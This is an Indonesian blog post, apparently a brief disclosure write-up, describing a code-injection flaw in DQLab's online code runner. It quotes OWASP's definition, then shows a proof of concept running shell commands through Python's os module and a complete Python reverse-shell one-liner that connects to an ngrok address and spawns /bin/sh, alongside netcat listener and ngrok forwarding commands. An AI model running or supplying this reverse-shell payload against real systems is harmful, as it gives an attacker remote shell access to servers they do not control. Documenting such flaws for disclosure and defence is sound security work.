Code Injection On DQLAB

  

 


 

Apa Itu Code Injection (Kode Injeksi) dan Apa Dampaknya?

Dikutip dari https://www.owasp.org/index.php/Code_Injection, Kode Injeksi adalah istilah umum untuk jenis serangan yang terdiri dari kode yang disuntikan yang kemudian ditafsirkan / dieksekusi oleh aplikasi. Serangan ini biasanya dimungkinkan karena kurangnya validasi data input / output yang tepat, misalnya:

  • Jarakter yang diizinkan (kelas regular expressions standar atau khusus)
    format data

  • Jumlah data yang diharapkan

Jika berhasil meng-eksploitasi serangan ini, dampaknya dapat mencakup bocornya data, hilangnya data atau informasi yang telah dicuri oleh penyerang 

POC (Proof Of Concept) :

Saya mencoba menjalankan perintah shell dengan modul os, ternyata code tereksekusi dengan lancar 

import osos.system('uname -a')

lalu saya mencoba me-reverse shell via command line, sebelumnya saya menggunakan netcat untuk listener “nc -lvp 6969” Karena ip address saya bukan public ip maka saya akan forward ip address saya dengan ngrok “ngrok tcp 6969” kemudian gunakan public address yang di assign ngrok sebagai ip dan port dipayload yang dieksekusi. Berikut kode yang saya gunakan

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ngrok.io",12084));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);




Sekian dari saya kurang lebih mohon maaf , Wassalamualaikum Wr.Wb

1 komentar